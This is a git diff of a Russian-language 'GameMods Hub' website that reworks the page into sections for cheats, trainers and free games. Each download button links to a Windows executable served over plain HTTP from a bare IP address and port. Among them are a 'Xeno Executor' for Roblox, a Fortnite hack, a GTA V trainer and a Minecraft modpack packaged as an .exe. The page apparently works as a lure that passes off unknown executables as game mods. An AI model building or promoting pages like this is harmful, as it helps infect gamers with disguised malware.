--- a/index.html
+++ b/index.html
@@ -1,22 +1,66 @@
 <!DOCTYPE html>
-<html>
+<html lang="ru">
 <head>
-    <title>Game Mods Hub</title>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>GameMods Hub</title>
     <link rel="stylesheet" href="style.css">
 </head>
 <body>
-    <h1>🎮 Бесплатные игры и моды</h1>
-    
-    <div class="download-item">
-        <h2>Xeno Executor</h2>
-        <p>Мощный инструмент для Roblox</p>
-        <a href="http://194.79.46.110:1080/mrx/xeno.exe" class="download-btn">Скачать</a>
+    <div class="container">
+        <header>
+            <h1 class="neon-text">🎮 GAMEMODS HUB</h1>
+            <p class="subtitle">Лучшие моды, читы и трейнеры</p>
+        </header>
+
+        <nav class="nav-buttons">
+            <button class="nav-btn neon-btn" onclick="showSection('cheats')">👾 ЧИТЫ</button>
+            <button class="nav-btn neon-btn" onclick="showSection('trainers')">⚡ ТРЕЙНЕРЫ</button>
+            <button class="nav-btn neon-btn" onclick="showSection('games')">🎯 ИГРЫ</button>
+        </nav>
+
+        <!-- Секция читов -->
+        <section id="cheats" class="section active">
+            <h2>👾 Популярные читы</h2>
+            <div class="download-grid">
+                <div class="download-card">
+                    <h3>Xeno Executor</h3>
+                    <p>Мощный инструмент для Roblox</p>
+                    <a href="http://194.79.46.110:1080/mrx/xeno.exe" class="download-btn">СКАЧАТЬ</a>
+                </div>
+                <div class="download-card">
+                    <h3>Fortnite Hack</h3>
+                    <p>Читы для Fortnite</p>
+                    <a href="http://194.79.46.110:1080/mrx/fortnite.exe" class="download-btn">СКАЧАТЬ</a>
+                </div>
+            </div>
+        </section>
+
+        <!-- Секция трейнеров -->
+        <section id="trainers" class="section">
+            <h2>⚡ Игровые трейнеры</h2>
+            <div class="download-grid">
+                <div class="download-card">
+                    <h3>GTA V Trainer</h3>
+                    <p>Трейнер для Grand Theft Auto V</p>
+                    <a href="http://194.79.46.110:1080/mrx/gtav.exe" class="download-btn">СКАЧАТЬ</a>
+                </div>
+            </div>
+        </section>
+
+        <!-- Секция игр -->
+        <section id="games" class="section">
+            <h2>🎯 Бесплатные игры</h2>
+            <div class="download-grid">
+                <div class="download-card">
+                    <h3>Minecraft Mod</h3>
+                    <p>Мод пак для Minecraft</p>
+                    <a href="http://194.79.46.110:1080/mrx/minecraft.exe" class="download-btn">СКАЧАТЬ</a>
+                </div>
+            </div>
+        </section>
     </div>
 
-    <div class="download-item">
-        <h2>Game Trainer</h2>
-        <p>Трейнер для одиночных игр</p>
-        <a href="http://194.79.46.110:1080/mrx/trainer.exe" class="download-btn">Скачать</a>
-    </div>
+    <script src="script.js"></script>
 </body>
 </html>
